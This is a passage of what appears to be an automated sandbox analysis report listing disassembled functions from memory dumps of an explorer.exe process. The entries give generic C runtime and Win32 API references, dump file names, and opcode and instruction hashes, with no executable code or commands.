                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                        • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction ID: 556854c375b2f341df53dfac3999ae117238eb7fa722a63a71e21073481073b7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95210C76608740C6C630DF19E48036E7760FB85BA5F058216DF9D07764DF39D886CB41
                                                                                                                                                                                                                        Function 0DF11ABB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DF11AE6
                                                                                                                                                                                                                        • RaiseException.KERNEL32 ref: 0DF11B0F
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DF11B70
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DF11AC3
                                                                                                                                                                                                                          • Part of subcall function 0DF0F930: _getptd_noexit.LIBCMT ref: 0DF0F936
                                                                                                                                                                                                                          • Part of subcall function 0DF0F930: _amsg_exit.LIBCMT ref: 0DF0F946
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DF11B75
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DF11B81
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                        • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction ID: 7cb08f6fd106dda4ff9feb5d9fe37f3381d45531e9e32d034f4b314b1b60657e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98211B7A60478087D630DF1AE44036EB760F789BA5F058216DF9E47BA4DF39D886CB41
                                                                                                                                                                                                                        Function 0B0C1ABB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0B0C1AE6
                                                                                                                                                                                                                        • RaiseException.KERNEL32 ref: 0B0C1B0F
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0B0C1B70
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0B0C1AC3
                                                                                                                                                                                                                          • Part of subcall function 0B0BF930: _getptd_noexit.LIBCMT ref: 0B0BF936
                                                                                                                                                                                                                          • Part of subcall function 0B0BF930: _amsg_exit.LIBCMT ref: 0B0BF946
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0B0C1B75
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0B0C1B81
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                        • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction ID: 0250a011e12f244d234fae6da93ef46d018441bc7d8b85676d5e88ee39cbb72b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1213976200681C6D638DF16E1807AFB7A1F388FA5F044216CF9A07BA5DF39E486CB51
                                                                                                                                                                                                                        Function 0DFEC0E8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFEC105
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFEC0FA
                                                                                                                                                                                                                          • Part of subcall function 0DFEFBA8: _getptd_noexit.LIBCMT ref: 0DFEFBAC
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DFEC14D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFEC15C
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFEC167
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                        • Instruction ID: c300095cae54031b052c0bfabc14835b62f84873e3d9a697744ddf196d855c18
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68210B62B0838192DF255B2D989033D76A0BB85BE4F55C225FBA987B98CA6CC9418B00
                                                                                                                                                                                                                        Function 0DF0C0E8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DF0C105
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DF0C0FA
                                                                                                                                                                                                                          • Part of subcall function 0DF0FBA8: _getptd_noexit.LIBCMT ref: 0DF0FBAC
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DF0C14D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DF0C15C
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DF0C167
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                        • Instruction ID: da319fe574341e44c882de84a8a3882d03d215c3c6cb2c5d4178abea3592fbe6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84210B62B0838192DF35576D998033DBE60FB85BE4F55C325EB9947BD8CA6CC941EB00
                                                                                                                                                                                                                        Function 0B0BC0E8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0B0BC105
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B0BC0FA
                                                                                                                                                                                                                          • Part of subcall function 0B0BFBA8: _getptd_noexit.LIBCMT ref: 0B0BFBAC
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0B0BC14D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B0BC15C
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0B0BC167
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                        • Instruction ID: 67f57e64d6aa12e1c0058380f24b3f9b92dc6142f0a7ec7cd275ae09a9d52db0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02213B6271438186FF7C57219890BED72D0F786BE0F544625EAA92BBA8CF6CC5418B00
                                                                                                                                                                                                                        Function 0DFE5B50 Relevance: 12.1, APIs: 8, Instructions: 57stringthreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2370468470-0
                                                                                                                                                                                                                        • Opcode ID: 9abf60a1bda62b455fc1ebc578719defbf62091858874b3fa4bb3827806bcb7a
                                                                                                                                                                                                                        • Instruction ID: 94edbbad7dc214cd08044b23f4fcf3841f711edc2ec4893b9940147b12fa4059
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9abf60a1bda62b455fc1ebc578719defbf62091858874b3fa4bb3827806bcb7a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A114F21604B8186EB549F66FD6436AB365FB88FD8F084465DE8A67B14DF7CC1C58700
                                                                                                                                                                                                                        Function 0DF05B50 Relevance: 12.1, APIs: 8, Instructions: 57stringthreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2370468470-0
                                                                                                                                                                                                                        • Opcode ID: 9abf60a1bda62b455fc1ebc578719defbf62091858874b3fa4bb3827806bcb7a
                                                                                                                                                                                                                        • Instruction ID: 0d656b838d3f8049dea307e030784c20043fc0a533d91d4cf6561348dc28580e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9abf60a1bda62b455fc1ebc578719defbf62091858874b3fa4bb3827806bcb7a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30117C21604B4183EB549FA2B90433AB7A1FB88FC4F098036EE4A93B64DF3CC2448704
                                                                                                                                                                                                                        Function 0B0B5B50 Relevance: 12.1, APIs: 8, Instructions: 57stringthreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2370468470-0
                                                                                                                                                                                                                        • Opcode ID: 23cf9390cb8199c783ebb6c3488d327ae55b3b95fb3aa94f8d3b5975ffb69508
                                                                                                                                                                                                                        • Instruction ID: d8a1399db9402f1a2d0e8e243465c5b25098b34ce2bbd068fd2a234a8aeaeb84
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23cf9390cb8199c783ebb6c3488d327ae55b3b95fb3aa94f8d3b5975ffb69508
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6118E31304B4086EB589F62BD1136AB3A6FB88FC4F084925DE4A53B14EF7CC1818700
                                                                                                                                                                                                                        Function 0DFE5780 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$malloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3301496367-0
                                                                                                                                                                                                                        • Opcode ID: 9e23c31e38dd96f206263be40e73b7d31154da733f725efe975d28a218771bd5
                                                                                                                                                                                                                        • Instruction ID: 7e8d1284416e963ece39b5c745f05a646d5d8ebf33a35afcea548687ac593938
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e23c31e38dd96f206263be40e73b7d31154da733f725efe975d28a218771bd5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B315A76714B8486DA10CF66E85836AB7A5F788BC8F948425EF8E57B14DF7CC185CB00
                                                                                                                                                                                                                        Function 0DF05780 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$malloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3301496367-0
                                                                                                                                                                                                                        • Opcode ID: 9e23c31e38dd96f206263be40e73b7d31154da733f725efe975d28a218771bd5
                                                                                                                                                                                                                        • Instruction ID: 600f9a2c04546c183ebb9832f830d6c4225986bb3cc465c27caef99e1aa96ae0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e23c31e38dd96f206263be40e73b7d31154da733f725efe975d28a218771bd5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C319076614B8586DA04CFAAE44436ABBA5F788BC4F958426DF8E43B14DF7CC145CB00
                                                                                                                                                                                                                        Function 0B0B5780 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$malloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3301496367-0
                                                                                                                                                                                                                        • Opcode ID: fbfbbdd83794e65d7895c3329bb9515f5b568a2036b9023914a40692d2934db5
                                                                                                                                                                                                                        • Instruction ID: eb3b6f12db91b937c549dd8d136bc923e1c5c4aa86b9b7670107a5435785eb51
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbfbbdd83794e65d7895c3329bb9515f5b568a2036b9023914a40692d2934db5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79319A36614B8086DA04CFA6E85879AB7A1F788BC8F544426DF9E53B14EF7CC085CB00
                                                                                                                                                                                                                        Function 00B683F9 Relevance: 10.7, APIs: 7, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00B68424
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 00B68419
                                                                                                                                                                                                                          • Part of subcall function 00B5F4DD: _getptd_noexit.LIBCMT ref: 00B5F4E1
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 00B684C7
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00B684D2
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction ID: 12f17a9b92151c3884f51716961fffb9e8ec1ce18e71652f3f944b320c298231
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D413C30518A5F4BDB68AB19905527673E0FB64356B9803EFE8D7C7295EF2CCC828781
                                                                                                                                                                                                                        Function 02C083F9 Relevance: 10.7, APIs: 7, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 02C08424
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 02C08419
                                                                                                                                                                                                                          • Part of subcall function 02BFF4DD: _getptd_noexit.LIBCMT ref: 02BFF4E1
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 02C084C7
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 02C084D2
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction ID: 07d98c15896295b2c19d7c98a8e3e8e8489c85085255ca67736dff287348efd1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA415D30518F5E8BDF64EB5990E027973D1FB84319B98836FE8D6C31D4EB24CA428B81
                                                                                                                                                                                                                        Function 0B9B83F9 Relevance: 10.7, APIs: 7, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0B9B8424
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B9B8419
                                                                                                                                                                                                                          • Part of subcall function 0B9AF4DD: _getptd_noexit.LIBCMT ref: 0B9AF4E1
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B9B84C7
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0B9B84D2
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction ID: ace196527d8e1fa8116f50feff0a40f0d9796cef70a88d4567942ae554c91a24
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1418D34918F5E8FCB28AB1981D5EF173DDFB4C316B98026FE8D6C3184EA64C8428781
                                                                                                                                                                                                                        Function 0DFF05C4 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _malloc_crt.LIBCMT ref: 0DFF05ED
                                                                                                                                                                                                                          • Part of subcall function 0DFEE41C: malloc.LIBCMT ref: 0DFEE447
                                                                                                                                                                                                                          • Part of subcall function 0DFEE41C: Sleep.KERNEL32 ref: 0DFEE45A
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DFF06EE
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DFF070A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2523592665-0
                                                                                                                                                                                                                        • Opcode ID: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                        • Instruction ID: 236c9776b561fa654d89068c6967046950883b0151da323a656fd06eca3af1a4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC519036705B4093EB21EF1AFD5072A73A4FB88B98F4581259F8D47B21EF78C4A68744
                                                                                                                                                                                                                        Function 0DF105C4 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
